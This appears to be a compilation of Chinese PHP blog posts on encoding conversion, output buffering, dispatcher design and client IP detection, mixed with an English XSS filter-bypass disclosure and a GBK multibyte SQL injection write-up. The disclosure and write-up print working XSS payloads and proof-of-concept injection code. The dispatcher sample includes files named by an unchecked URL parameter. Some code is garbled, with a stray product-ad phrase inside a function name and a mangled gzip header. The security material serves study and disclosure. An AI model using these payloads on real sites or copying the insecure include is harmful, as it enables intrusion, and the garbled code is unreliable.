php程序中的编码转换

在php中解决字符编码转换,可以编写自定义的php函数进行字符编码解码,但是对性能有一定影响,并且要针对每种字符编码编写专用的函数; 这里介绍在php中有简便易用的专用函数:

1.使用iconv函数转换字符编码,该函数仅能在PHP4.0.5以上版本或PHP5.x版本使用,具体用法如下:

$string=iconv(原字符编码, 字符输出编码, $string);

例如:网页使用gbk编码,字符串使用utf-8编码,将字符转换为网页显示编码。

echo iconv("uft-8", "gbk", "php编码转换");

在实际使用中,iconv函数在转换时存在一点小bug,在转换字符串中含有"—"时会出错,导致字符串无法转换,使用//IGNORE参数可以忽略转换中的字符错误,样例如下:

echo iconv("uft-8", "gbk//IGNORE", "php编码转换");

2.使用mb_convert_encoding函数,该函数仅能在PHP4.0.6以上版本或PHP5.x版本使用,使用之前必须enable mbstring,具体用法如下:

$string=mb_convert_encoding($string, 字符输出编码, 原字符编码);

例如:网页使用gbk编码,字符串使用utf-8编码,将字符转换为网页显示编码。

echo mb_convert_encoding("php编码转换", "gbk", "utf-8");

windows下mbstring安装配置请参看这里 windows下PHP 激活mbstring扩展及php.ini中相关基本设置

总结:推荐使用mb_convert_encoding函数,该函数无iconv转换字符错误问题。

PHP缓冲机制:缓冲控制,压缩http响应数据,缓冲 PHP输出

动态网站的内容加速显示十分重要,本文通过对 PHP 几个函数的深入讨论,提出了 PHP 网页压缩和缓冲的解决方案

一、介绍几个控制 PHP 输出的函数

PHP采用了缓冲机制,在你决定发送以前,所有内容只是存在于缓冲中,而不是直接发送给浏览器,虽然你可以用 header 和 setcookie 函数来实现,但是这两个函数相比于功能强大的输出函数来说只是一点“雕虫小技”。让我们来看看这些函数的真本事:

void ob_start(void);

本函数告诉 PHP 处理器把所有输出重定向到内部缓冲,调用这个函数后,就不会有输出到浏览器。

string ob_get_contents(void);

本函数把输出缓冲返回到一个字符串,你可以用来把堆积起来的输出一起发送到浏览器。当然要先关掉缓冲。

int ob_get_length(void);

本函数返回输出缓冲的长度。

void ob_end_clean(void);

本函数清除并关闭缓冲。在输出到浏览器之前你需要使用这个函数。

void ob_implicit_flush ([int flag])

本函数用来控制隐式缓冲泻出,缺省为 off,如果打开时,对每个 print/echo 或者输出命令的结果都发送到浏览器。

二、采用输出控制来压缩 PHP 的输出

在开始之前,要保证你的 PHP4 编译时支持 Zlib。
首先,初始化输出缓冲:

ob_start();
ob_implicit_flush(0);
?>

然后产生所有的输出内容。

print(”本例为压缩输出!”);
?>
页面生成以后,采用:

$contents = ob_get_contents();
ob_end_clean();
?>

还要检查浏览器是否支持压缩数据,我们采用在变量 $HTTP_ACCEPT_ENCODING 中检查 “gzip, deflate”的办法:

if(ereg(’gzip, deflate’,$HTTP_ACCEPT_ENCODING)) {
// 产生 gzip 后的内容
} else {
echo $contents;
}
?>

下面我们分析怎样产生 gzip 输出:

// 告诉浏览器下面接收的是 gzip 数据。
header(”Content-Encoding: gzip”);
// 显示 gzip 文件的文件头
// 只要一次就够了
echo “x1fx8bx08×00x00×00x00×00″;
// 计算长度和 CRC 校验码
$Size = strlen($contents);
$Crc = crc32($contents);
// 压缩数据
$contents = gzcompress($contents, 9);
// 不能直接在这里输出内容,因为还没有写入 CRC 呢!
$contents = substr($contents, 0, strlen($contents) – 4);
echo $contents;
gzip_PrintFourChars($Crc);
gzip_PrintFourChars($Size);
function gzip_PrintFourChars($Val) {
for ($i = 0; $i < 4; $i ++) { echo chr($Val % 256); $Val = floor($Val / 256); } } ?>

三、缓冲 PHP 的输出

在 PHP里能很容易的实现缓冲,我们来看例子:

// 对请求的 URI 产生唯一的文件名。
$cached_file=md5($REQUEST_URI);
if((!file_exists(”/cache/$cached_file”))||(!is_valid(”/cache/$cached_file”))) {
ob_start();
ob_implicit_flush(0);
// 在这里输出缓冲
$contents = ob_get_contents();
ob_end_clean();
$fil=fopen($cached_file,”w+”);
fwrite($fil,$contents,$strlen($contents));
fclose($fil);
}

readfile($cached_file);
?>

四、结论

PHP 输出缓冲函数在操作脚本输出方面十分有用,把缓冲压缩后输出能减少 80% 的输出时间,这对于存取其他数据资源(例如数据库或者 XML)来说,也是一个很好的缓冲机制。

Bypassing script filters with variable-width encodings

Author: Cheng Peng Su (applesoup_at_gmail.com)
Date: August 7, 2006

We've all known that the main problem of constructing XSS attacks is
how to obfuscate malicious code. In the following paragraphs I will

attempt to explain the concept of bypassing script filters with
variable-width encodings, and disclose the applications of this
concept to

Hotmail and Yahoo! Mail web-based mail services.

Variable-width encoding Introduction
====================================

A variable-width encoding(a.k.a variable-length encoding) is a type of
character encoding scheme in which codes of differing lengths are

used to encode a character set. Most common variable-width encodings
are multibyte encodings, which use varying numbers of bytes to encode

different characters. The first use of multibyte encodings was for the
encoding of Chinese, Japanese and Korean, which have large character

sets well in excess of 256 characters. The Unicode standard has two
variable-width encodings: UTF-8 and UTF-16. The most commonly-used

codes are two-byte codes. The EUC-CN form of GB2312, plus EUC-JP and
EUC-KR, are examples of such two-byte EUC codes. And there are also

some three-byte and four-byte codes.

Example and Discussion
======================

The following is a php file from which I will start to introduce my idea.

------------------------------example.php--------------------------------

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<?

for($i=0;$i<256;$i++){
echo "Char $i is <font face=\"xyz".chr($i)."\">not </font>"
."<font face=\" onmouseover=alert($i) notexist=".chr($i)."\"     >"
// NOTE: 5 space characters following the last \"
."available</font>\r\n\r\n<br>\r\n\r\n";
}

?>
</body>
</html>

-------------------------------------------------------------------------

For most values of $i, Internet Explorer 6.0(SP2) will display "Char
XXX is not available". When $i is between 192(0xC0) and 255(0xFF), you

can see "Char XXX is available". Let's take $i=0xC0 for example,
consider the following code:

Char 192 is <font face="xyz[0xC0]">not </font><font face="
onmouseover=alert(192) s=[0xC0]"     >available</font>

0xC0 is one of the 32 first bytes of 2-byte sequences (0xC0-0xDF) in
UTF-8. So when IE parses the above code, it will consider 0xC0 and the

following quote as a sequence, and therefore these two pairs of FONT
elements will become one with "xyz[0xC0]">not </font><font face=" as

the value of FACE parameter. The second 0xC0 will start another 2-byte
sequence as a value of NOTEXIST parameter which is not quoted. Due

to a space character following by the quote, 0xE0-0xEF which are first
bytes of 3-byte sequences, together with the following quote and one

space character will be considered as the value of NOTEXIST parameter.
And each of the first bytes of 4-byte sequences(0xF0-0xF7), 5-byte

sequences(0xF8-0xFB), 6-byte sequences(0xFC-0xFD), together with the
following quote and space characters will be considered as one

sequence.

Here are the results of the above code parsed by Internet Explorer
6.0(SP2), Firefox 1.5.0.6 and Opera 9.0.1 in different variable-width

encodings respectively. Note that the numbers in the table are the
ranges of "available" characters.

+-----------+-----------+-----------+-----------+
|           | IE        | FF        | OP        |
+-----------+-----------+-----------+-----------+
| UTF-8     | 0xC0-0xFF | none      | none      |
+-----------+-----------+-----------+-----------+
| GB2312    | 0x81-0xFE | none      | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| GB18030   | none      | none      | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| BIG5      | 0x81-0xFE | none      | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| EUC-KR    | 0x81-0xFE | none      | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| EUC-JP    | 0x81-0x8D | 0x8F      | 0x8E      |
|           | 0x8F-0x9F |           | 0x8F      |
|           | 0xA1-0xFE |           | 0xA1-0xFE |
+-----------+-----------+-----------+-----------+
| SHIFT_JIS | 0x81-0x9F | 0x81-0x9F | 0x81-0x9F |
|           | 0xE0-0xFC | 0xE0-0xFC | 0xE0-0xFC |
+-----------+-----------+-----------+-----------+

Application
===========

I don't think there is a typical exploitation of bypassing script
filters with variable-width encodings, because the exploitation is
very

flexible. But you just need to remember that if the webapp use
variable-width encodings, you can bury some characters following by
your

entry, and the buried characters might be very crucial.

The above code might be exploited in general webapps which allow you
to add formatting to your entry in the same way as HTML does. For

example, in some forums, [font=Courier New]message[/font] in your
message will be transformed into <font face="Courier
New">message</font>.

Supposing it use UTF-8, we can attack by sending

[font=xyz[0xC0]]buried[/font][font=abc onmouseover=alert()
s=[0xC0]]exploited[/font]

And it will be tranformed into

<font face="xyz[0xC0]">buried</font><font face="abc
onmouseover=alert() s=[0xC0]">exploited</font>

Again, the exploitation is very flexible, this FONT-FONT example is
just an enlightening one. The following exploitaion to Yahoo! Mail is

quite different from this one.

Disclosure
==========

Using this method, I have found two XSS vulnerabilities in Hotmail and
Yahoo! Mail web-based mail services. I informed Yahoo and Microsoft

on April 30 and May 12 respectively. And they have patched the vulnerabilities.

Yahoo! Mail XSS
---------------

Before I discovered this vulnerability, Yahoo! Mail filtering engine
could block "expression()" syntax in a CSS attribute using a comment

to break up expression( expr/* */ession() ). I used [0x81] with the
following asterisk to make a sequence, so that the second */ would

close the comment. But the filtering engine considered the first two
comment symbol as a pair.

--------------------------------------------------------------------
MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=GB2312
Subject: example

<span style='width:expr/*[0x81]*/*/ession(alert())'>exploited</span>
.
--------------------------------------------------------------------

Hotmail XSS
-----------

This exploitation is almost the same as the example.php.

--------------------------------------------------------------------
MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=SHIFT_JIS
Subject: example

<font face="[0x81]"></font><font face=" onmouseover=alert()
s=[0x81]">exploited</font>
.
--------------------------------------------------------------------

Reference
=========

Wikipedia:Variable-width
encoding(http://en.wikipedia.org/wiki/Variable-width_encoding)
RFC 3629, the UTF-8 standard(http://tools.ietf.org/html/rfc3629)
RSnake:XSS Cheat Sheet(http://ha.ckers.org/xss.html)

( Original text: http://applesoup.googlepages.com/bypass_filter.txt )

PHP字符编码绕过漏洞总结

其实这东西国内少数黑客早已知道,只不过没有共享公布而已。有些人是不愿共享,宁愿烂在地里,另外的一些则是用来牟利。
该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过 addslashes() 转换后变为0xbf5c27,前面的0xbf5c是个有效的GBK字符,所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理,结果漏洞 就触发了。

mysql_real_escape_string() 也存在相同的问题,只不过相比 addslashes() 它考虑到了用什么字符集来处理,因此可以用相应的字符集来处理字符。在MySQL 中有两种改变默认字符集的方法。

方法一:

改变mysql配置文件my.cnf
[client]
default-character-set=GBK
方法二:
在建立连接时使用
CODE:
SET CHARACTER SET 'GBK'
例:mysql_query("SET CHARACTER SET 'gbk'", $c);
问题是方法二在改变字符集时mysql_real_escape_string() 并不知道而使用默认字符集处理从而造成和 addslashes() 一样的漏洞
下面是来自http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html的测试代码
<?php

$c = mysql_connect("localhost", "user", "pass");
mysql_select_db("database", $c);

// change our character set
mysql_query("SET CHARACTER SET 'gbk'", $c);

// create demo table
mysql_query("CREATE TABLE users (
username VARCHAR(32) PRIMARY KEY,
password VARCHAR(32)
) CHARACTER SET 'GBK'", $c);
mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')", $c);

// now the exploit code
$_POST['username'] = chr(0xbf) . chr(0x27) . ' OR username = username /*';
$_POST['password'] = 'anything';

// Proper escaping, we should be safe, right?
$user = mysql_real_escape_string($_POST['username'], $c);
$passwd = mysql_real_escape_string($_POST['password'], $c);

$sql = "SELECT * FROM  users WHERE  username = '{$user}' AND password = '{$passwd}'";
$res = mysql_query($sql, $c);
echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records

?>
纵观以上两种触发漏洞的关键是addslashes() 在Mysql配置为GBK时就可以触发漏洞,而mysql_real_escape_string() 是在不知道字符集的情况下用默认字符集处理产生漏洞的。
下面再来分析下国内最近漏洞产生的原因。
问题出现在一些字符转换函数上,例如mb_convert_encoding()和iconv()等。
发布在80sec上的说明说0xc127等一些字符再被addslashes() 处理成0xc15c27后,又经过一些字符转换函数变为0×808027,而使得经过addslashes() 加上的"\"失效,这样单引号就又发挥作用了。这就造成了字符注入漏洞。
根据80sec的说明,iconv()没有该问题,但经我用0xbf27测试
$id1=mb_convert_encoding($_GET['id'], 'utf-8', 'gbk');
$id2=iconv('gbk//IGNORE', 'utf-8', $_GET['id']);
$id3=iconv('gbk', 'utf-8', $_GET['id']);
这些在GPC开启的情况下还是会产生字符注入漏洞,测试代码如下:
<?php

$c = mysql_connect("localhost", "user", "pass");
mysql_select_db("database", $c);

// change our character set
mysql_query("SET CHARACTER SET 'gbk'", $c);

// create demo table
mysql_query("CREATE TABLE users (
username VARCHAR(32) PRIMARY KEY,
password VARCHAR(32)
) CHARACTER SET 'GBK'", $c);
mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')", $c);

// now the exploit code
//$id1=mb_convert_encoding($_GET['id'], 'utf-8', 'gbk');
$id2=iconv('gbk//IGNORE', 'utf-8', $_GET['id']);
//$id3=iconv('gbk', 'utf-8', $_GET['id']);

$sql = "SELECT * FROM  users WHERE  username = '{$id2}' AND password = 'password'";
$res = mysql_query($sql, $c);
echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records

?>
测试情况 http://www.safe3.cn/test.php?id=%bf%27 OR username = username /*

后记,这里不光是%bf,其它许多字符也可以造成同样漏洞,大家可以自己做个测试的查下,这里有zwell文章提到的一个分析http://hackme.ntobjectives.com/sql_inject/login_addslashes.php 。编码的问题在xss中也有利用价值,详情请看我早期转载的一篇文章Bypassing script filters with variable-width encodings [注,已被转到本站]

from http://huaidan.org/archives/2268.html

单一入口web应用程序概述:结构,特点,优点,缺点/php,asp,jsp

单一入口应用程序概述

什么是单一入口应用程序?

在解释什么是单一入口应用程序之前,我们先来看看传统的 web 应用程序。
news.php 显示新闻列表
news_edit.php 显示新闻编辑页面
这两个页面不但分别实现了两个功能,还成为了应用程序的两个入口。

那什么是入口啊?
打个比方,大家上 WC,都是男生进一个门,女生进一个门。这两个门就是 WC 的两个入口。

呵呵,上面的例子应该很好理解吧。那稍微变换一下,单一入口的概念就很容易理解了。
现在我们是进一个公共 WC,不管男女都是从最外面的入口进入,交了钱以后才分别进两个门。那最外面的入口就是这个 WC 的单一入口。

所以单一入口的应用程序实际上就是说用一个文件处理所有的 HTTP 请求。例如不管是新闻列表功能还是新闻编辑功能,都是从浏览器访问 index.php 文件。这个 index.php 文件就是这个应用程序的单一入口。

index.php 如何知道用户是要使用哪一个功能呢?

很简单,我们访问 index.php 时跟上一个特定的参数就行了。例如 index.php?action=news 就是显示新闻列表,而 index.php?action=news_edit 就是新闻编辑。

而在 index.php 里面,仅用两行代码就可以实现这种效果。
<?php
$action = $_GET['action'] == '' ? 'index' : $_GET['action'];
include('files/' . $action . '.php');
?>

上面的代码中,第一行是从 url 中取出 action 参数。如果没有提供 action 参数,就设置一个默认的 'index' 作为参数。
第二行代码就是根据 $action 参数调用不同的代码文件,从而实现单一入口对应不同功能的效果。

单一入口应用程序的入口文件很复杂?

有些朋友可能以为单一入口程序的 index.php 会像面条一样复杂,其实是误解。
例如我现在的应用程序入口文件只有下面几行:
<?php
define('APP', realpath('../libs/website'));
define('LANG', 'gb2312');
define('DEBUG', 1);

require('../libs/flea1/basic.php');
run();
?>
足够简单了吧?

当然了,在 index.php 里面写上一长串 switch case 绝对是拙劣的实现方式。但这纯粹是开发者自己的设计和实现问题,而不是单一入口应用程序这种设计思想的问题。

补充说明: 这里提到 switch case 并不是说用了 switch 就代表“落后”、“土气”等。只是说在 index.php 这个入口程序里面写上一堆 switch case 不利于程序的修改和维护,所以是一种不好的用法。

当web服务器(apache或者iis)收到一个http请求时,会解析该请求,确定要访问哪一个文件。例如 http://www.xxx.com/news.php的解析结果就是要求web服务器解析 news.php 文件,并返回结果给浏览器。现在看看单一入口应用程序的 index.php 文件,就会发现 index.php 实际上根据 url 参数进行了第二次解析。

完成这个解析的程序一般称为 Dispatcher(中文的准确翻译我也不知道),大概意思就是将不同的请求转发到不同的处理程序进行处理。

在单一入口应用程序中,index.php 和 web服务器一起构成了一个 Dispatcher,根据 http 请求和 url 参数来确定请求的处理程序。

了解了 Dispatcher 的概念后,我们可以发现前面提到的两行代码实际上就是一个最简单的 Dispatcher 实现:
<?php
$action = $_GET['action'] == '' ? 'index' : $_GET['action'];
include('files/' . $action . '.php');
?>

诚然,对于一个安全、健壮的应用程序,Dispatcher 肯定不是上面那么简单。在调用实际代码前,还会加上各种判断、安全性检查等。例如判断 url 指定的功能是否可以访问以及 url 中包含了无效的参数。

看到这里,朋友们肯定会说:单一入口程序就多了就这样一个 dispatcher ,和我直接做成 news.php、news_edit.php 等单个文件相比有什么好处啊?

单一入口应用程序的优势

单一入口应用程序的所有http请求都是通过 index.php 接收并转发到功能代码去的,所以我们在 index.php 里面就能完成许多实际工作。

这里我只拿安全性检查为例详细说明一下:
由于所有的 http 请求都由 index.php 接收,所以可以进行集中的安全性检查。如果不是单一入口,那么开发者就必须记得在每一个文件的开始加上安全性检查代码(当然,安全性检查代码可以写到另一个文件中,只需要include进来就可以了)。
但我想大家都是懒人,也许记性也不好,难免有忘记的时候。因此要记得在每一个文件前面都加上必要的include可不是件容易做到的事情。

与安全性检查类似。在入口里,我们还可以对url参数和post进行必要的检查和特殊字符过滤、记录日志、访问统计等等各种可以集中处理的任务。

“咦,搞这么多功能,不是会把 index.php 搞得很复杂吗?”
“不会的。只需要把各种功能写到单独的文件,然后在index.php里面include进来就可以了!”

可以看出,由于这些工作都被集中到了 index.php 来完成,可以减轻我们维护其他功能代码的难度。例如在10个文件中保持头部的几个include都一致可不是件让人愉快的事情。

单一入口应用程序的缺点

任何事情都有两面性,单一入口应用程序也不例外。由于所有 http 请求都是针对 index.php,所以应用程序的 url 看起来确实不那么美观。特别是对搜索引擎来说很不友好。

要解决这个问题,可以采用 url 重写、PATHINFO 等方式。但我个人更推荐在前台页面不使用单一入口方式,而是保持多个文件入口。或者两者混用。例如新闻列表采用单独的 news.php 显示,而用户注册、发表信息等则采用单一入口。因为对于网站拥有者来说,新闻列表、新闻显示页面才是需要搜索引擎关注的高价值目标,而用户注册页面等交互 性功能则根本没有收录的价值。

有朋友提到单一入口的应用程序会有很长一串参数,那么我们分析一下下面这个 url:

index.php?url=news&news_id=123&page=2&sort=title
如果改为直接访问 news.php,也只不过省掉了 url=news 这一个参数而已。

所以认为单一入口的应用程序 url 太复杂是没有道理的。

如何组织单一入口应用程序的功能代码?

单一入口应用程序最大的挑战来自于如何合理组织各个功能的处理代码。但只要遵循一定的步骤,也可以轻松的解决掉这个难题。

首先,对于应用程序的功能要做出一个合理的分解。例如后台的新闻栏目可能包含“添加新闻”、“编辑新闻”、“删除新闻”等多个功能。这时我们就可以将这一组逻辑上关联的功能组合到一个功能模块中,称为“新闻管理”模块。
按照上面的方法整理完应用程序的功能,我们就会得到多个功能模块,而每个模块又是由多个功能组成。(实际上,即便不是单一入口应用程序,功能的整理也是必须的步骤。)

整理完功能后,我们就需要确定如何存放各个功能的代码

这里我推荐两种方式:

1、每个功能模块一个子目录,目录里的每一个文件就是一个功能的实现代码。
这种方式的好处是每个功能的代码都互相隔离,非常便于多人协作。缺点是每个功能之间共享代码和数据不那么方便。例如新闻管理模块中的所有功能都需要一个 “取出新闻栏目记录”的功能,那么采用这种多个独立文件的组织方式,“取出新闻栏目记录”就只能写在另一个文件中,然后由需要该功能的文件include 进去。 

2、每个模块一个文件,模块中的每个功能写成一个函数或者一个类方法。
好处不用多说了,非常便于共享代码和数据。缺点就是如果几个人同时改,容易发生冲突。不过借助版本控制软件和差异比较合并工具,冲突还是很容易解决的。

好了,我们的功能代码都确定存放方式了。那么如何调用呢?
index.php 如何调用功能代码?

调用首先就是要设计一个规则,然后让 index.php 根据这个规则来搜索和调用功能代码。就我自己来说,我总是使用 $_GET['url'] 来指定要调用的功能模块,而 $_GET['action'] 来指定该模块的特定功能。因此我的应用程序会使用如下的 url 地址:
index.php?url=news&action=edit

觉得两个参数太多了?那可以使用 index.php?func=news.edit 这样的 url。只需要将 news.edit 拆开为 news 和 edit 就行了。

“嘿嘿,那我故意搞一个 index.php?url=news&action=xxx,看你的应用程序还能运行?”
很显然,这样的 url 只会使得 index.php 无法找到需要的功能代码,最后报告错误。但是这和你在浏览器中访问 newsxxx.php 这个并不存在的文件有什么本质区别呢?

相反,我还可以让 index.php 在发现找不到需要的功能代码时显示一个漂亮的出错页面,并提供一个返回网站首页的连接。

在实际开发中,我倾向于将一些基本服务从应用程序中抽取出来,形成一个应用程序框架。这个框架通常会包含一个 Dispatcher、基本的数据库访问服务、模版引擎、常用的辅助功能等。由于有了一个框架,所以我可以更加让 Dispatcher 更加灵活。例如可以对某些功能模块应用权限检查,而另一些则不检查。
进一步了解单一入口应用程序

要深刻理解一个事物,自己尝试一下是最好的办法。

你可以选择自己实现一个 Dispatcher 以及相应的各种规则,或者选择一个现有的应用程序框架。但更好的方式还是首先尝试一下现有的框架,然后再自己尝试实现一个类似的。这样可以在最短的时间内获得最多的收获。

目前绝大多数 php 应用程序框架都是单一入口的,并采用了 MVC 模式(很遗憾,由于 MVC 实在太复杂,并且和单一入口应用程序也没有必然联系,所以我就不赘述了。感兴趣的朋友可以 google 一下相关资料)。

php获取客户端IP地址方法大汇总

php获取客户端IP地址方法方法1

PHP Code one:

<?
$iipp
=$_SERVER["REMOTE_ADDR"];
echo
$iipp;
?>

 

php获取客户端IP地址方法方法2

PHP Code two:

<?php
$user_IP
= ($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];
$user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"];echo$user_IP;
?>

///////////////////////////////////////////////<?
function get_real_ip(){
$ip=false;
if(!empty(
$_SERVER["HTTP_CLIENT_IP"])){
$ip = $_SERVER["HTTP_CLIENT_IP"];
}
if (!empty(
$_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ips = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']);
if (
$ip) { array(促销产品 主营产品)_unshift($ips, $ip); $ip = FALSE; }
for (
$i = 0; $i < count($ips); $i++) {
if (!
eregi ("^(10|172\.16|192\.168)\.", $ips[$i])) {
$ip = $ips[$i];
break;
}
}
}
return (
$ip ? $ip : $_SERVER['REMOTE_ADDR']);
}
echo get_real_ip();
?>
php获取客户端IP地址方法方法3
PHP Code three:
<?
//php获取ip的算法
if ($HTTP_SERVER_VARS["HTTP_X_FORWARDED_FOR"])
{
$ip = $HTTP_SERVER_VARS["HTTP_X_FORWARDED_FOR"];
}
elseif (
$HTTP_SERVER_VARS["HTTP_CLIENT_IP"])
{
$ip = $HTTP_SERVER_VARS["HTTP_CLIENT_IP"];
}
elseif (
$HTTP_SERVER_VARS["REMOTE_ADDR"])
{
$ip = $HTTP_SERVER_VARS["REMOTE_ADDR"];
}
elseif (
getenv("HTTP_X_FORWARDED_FOR"))
{
$ip = getenv("HTTP_X_FORWARDED_FOR");
}
elseif (
getenv("HTTP_CLIENT_IP"))
{
$ip = getenv("HTTP_CLIENT_IP");
}
elseif (
getenv("REMOTE_ADDR"))
{
$ip = getenv("REMOTE_ADDR");
}
else
{
$ip = "Unknown";
}
echo
"你的IP:".$ip ;
?>
php获取客户端IP地址方法方法4
PHP Code four:
<?
if(getenv('HTTP_CLIENT_IP')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(
getenv('HTTP_X_FORWARDED_FOR')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(
getenv('REMOTE_ADDR')) {
$onlineip = getenv('REMOTE_ADDR');
} else {
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
echo
$onlineip;
?>

kingston U盘量产失败修复方法及工具

随便搞U盘量产,进行到半途中,进度条老长时间都没有动,一把拔下U盘,再插上后,突然发现电脑不认了,在右下角里的系统托盘里有显示,mash storage device,但资源管理器里没有,windows磁盘管理里也没有。看来是量产坏掉了,修复吧。

首选使用量产恢复工具,但没有找到,几个月前用sandisk的u盘量产并恢复过,很成功。但之前sandisk的工具肯定是用不上的,因为不是一家的主控芯片。网上查资料,有人说拆开把芯片的“引角短路”的方法修复(http://www.mydigit.net/read.php?tid=53927&page=1  点这里打开),正如文中所说,这拆后U盘就不能质保了,今天中午才买的,实在有点不甘心。尝试拆天,但好像确实比较难,用小刀撬了几下,没有撬开,太使劲不能保证外壳完整了,于是住手。

要找其它的工具,拆机是最后的方案,现在不考虑(至少还有这样方案:去买U盘的店里,说“u盘突然不识别了”,让老板想办法,反正也有5年保固服务的)。低格工具,Phison_UP10_lformat_v1.30,下载了好几个版本都不能用,提示“Preformat does not support this IC!”

不过还好,最后终于找到了一个可以用的,用自己的劳动救“活”了U盘。放到这里,以备日后使用、及有缘人使用。kingston金士顿DataTraveler8g U盘量产失败修复工具(下载该修复工具)

另附量产相关工具,好几个版本,全放这里好了。

ChipGenius/U盘芯片检测工具

kingstone 8g U盘量产工具(多个版本)

自由软件的定义/什么是自由软件/free software

我们维护本文来彰显自由软件定义,说明什么软件才合适被称为「自由软件」。

「自由软件」关於「自由」而不是价格,「自由 (Free) 」这个概念并不是指「免费的啤酒」,而是指「言论自由」【因为英文的自由和免费视同一个字: free】。

自由软件所指称的软件,其使用者有使用、复制、散布、研究、改写、再利用该软件的自由。更精确地说,自由软件赋予使用者四种自由:

  • 不论目的为何,有使用该软件的自由(自由之零)。
  • 有研究该软件如何运作的自由,并且得以改写该软件来符合使用者自身的需求(自由之一)。取得该软件之源码为达成此目的之前提。
  • 有重新散布该软件的自由,所以每个人都可以藉由散布自由软件来敦亲睦邻(自由之二)。
  • 有改善再利用该软件的自由,并且可以发表改写版供公众使用,如此一来,整个社群都可以受惠。如前项,取得该软件之源码为达成此目的之前提(自由之三)。

如果一软件的使用者具有上述四种权利,则该软件得以被称之为「自由软件」。也就是说,使用者必须能够自由地、以不收费或是收取合理的散布费用的方式、在任何时间再散布该软件的原版或是改写版 在任何地方给任何人 使用。如果使用者不必问任何人或是支付任何的许可费用从事这些行为,就表示她/他拥有自由软件所赋予的自由权利。

使用者也应该有自由改写软件的权利,并且可以将这些软件再利用在工作上或是娱乐上。

使用软件的这份自由权适用於任何人、任何组织、任何电脑系统、任何工作性质,不用特别和软件作者或是其他特别的人或单位报备。

再散布软件的自由必须同时适用於原版和改写版软件的二进制码和源码上,如果无法制作二进制码的版本,则此动作可以略过,但是如果后来的使用者找到其它可以制作二进制码的方式,她们必须有再散布二进制码的自由。

为了成就改写并发表改写版的自由,使用者必须有取得该软件源码的管道,所以,取得源码为自由软件之本。

为了使这些自由成真,只要使用者没犯下滔天大罪,这些自由权利不能被改变。如果使用者并未做错事,而该软件的作者却拥有取消或撤回其许可方式的权力,那么该软件不是自由软件。

但是,如果额外的规定不和上述四项主要的自由权利相冲的话,这些有关散布自由软件的额外规定是可被接受的。例如,另类版权 copyleft 规定说,当重新散布该软件时,作者不能加限制拒绝其他人主要的自由权利,这个规定并不和上述的主要自由相冲,反而更进一步保障了使用者的自由软件权益。

使用者可以付费取得 GNU 的软件,或者,使用者也可以免费取得这些软件,但是,不管使用者是如何取得这些软件的,她/他们必须永远有权利复制或是改写这些软件,甚至 贩售 这些软件。

自由软件因此并不是「非商业软件」。自由软件必须适用於商业用途。自由软件的商业开发模式已很常见;这样的自由商业软件相当重要。

如果不影响到后来的使用者发行改写的权利规定,则额外加入的规范如何将一个改写后的自由软件制作为套件的相关规定亦可行。同理,像这类「如果你用这 种方式发行软件,你必须让这个软件也能在这种情况下可得」的措辞也是在许可之下的(这类规定也让使用者有该不该发行该软件的选择)。如果许可证要求「在当 你发行修订版时,若先前的开发者要求一份拷贝,则你必须提供」的条件,它也是符合自由的。

在 GNU 工程中,我们使用 copyleft 这类许可方式来保护每个使用者都享有这些软件自由,但是 非 copyleft 的自由软件 也同时存在。我们相信有某些重要的原因使得 copyleft 的许可方式较其它自由软件许可方式要好 ,但是如果你的软件不是 在 copyleft 的许可之下,我们也使用它。

欲知自由软件、以 copyleft 许可的软件、和其它种类的软件的相连性,请见 「自由软件的种类」 一文。

有时候,政府 外销管制 和交易许可的规定会限制使用者全球性散布软件的权利和自由,虽然软件开发者/作者没有权力去排除或是消弭这些限制,但是,她/他们可以、 也必须拒绝将这些条件列入自由软件的使用法则中,如此这般,这些官方规定将不会影响到使用者的软件自由,和自由软件相关的人、事、物也因此不在这些政府部 门管辖范围之内。

大部份的自由软件的许可证是基於 copyleft ,而可以加诸於其上的要求类型是有限制的。如果一份基於版权的许可证遵守了如上所述的自由时,那么就不太可能会遇上我们从未预期过的其它类型的问题(虽然 偶尔还是会有)。不过,有一些自由软件的许可证是基於合同的条款,而合同可以被加诸较大程度的可能限制。这表示像是这样的许可证,会有许多可能的方式变得 受限到无法接受,因而成为「非自由」的。

我们实在无法列出所有无法接受的可能的合同限制。如果一份基於合同的许可证,以一种基於版权的许可证所无法的不寻常方式,限制了使用者,并且不能如本文所述的视为合格〔的自由条款〕,我们将会试著审度这合同,并且很有可能认定它是非自由的。

当谈到自由软件时,最好避免使用「给」或是「免费」这类的措辞,因为这些措辞会给人给人「free」是指「价格上的免费」的误导,而忽略了 使用软件自由的真义。有些词语像 「盗版」就有类似的涵义,我们希望自由软件的使用者不会想被这样指称。有关讨论这些措辞的用法,详见 「容易混淆的词语,请尽量避免」 一文,我们也有 「自由软件一词的翻译」 的多种语言版本。

